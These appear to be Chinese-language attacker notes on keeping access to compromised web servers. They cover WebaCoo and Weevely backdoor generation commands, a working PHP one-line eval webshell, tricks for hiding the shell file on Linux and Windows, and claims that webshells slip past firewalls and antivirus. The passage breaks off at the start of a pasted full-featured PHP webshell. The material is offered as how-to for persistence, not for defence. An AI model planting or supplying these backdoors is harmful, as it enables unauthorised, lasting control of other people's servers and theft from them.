权限维持
1介绍
可以持续性攻击(apt)
后门(backdoor),通过某个端口,或者协议等。
持久 系统重启以后还能访问
权限维持 = 后门+持久
通过后门来进行持久
2普通权限
@TOC
1web后门
1webcoo
kali linux生成php
webacoo -g -o /1.php
测试
webacoo -t -u http://ip/1.php
2weely后门
weely生成木马
测试
3普通php
web后门(通过80端口,一般的网站渗透,框架漏洞利用)
一句话 <?php @eval($_POST[123]);?>
隐藏一句话mv shell.php .shell.php,linux一般人喜欢用ls 而不是ls -al
windows 命令则是 attrib +s +h shell.php
webshell
webshell优点
1正常访问,一般不会被防火墙给强奸
2免杀容易,容易绕过
3功能强大,方便进行一大波操作
附上网上找到的五行代码php大马,大马方便进行内网漫游。
<?php
$password='admin';//登录密码
//本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色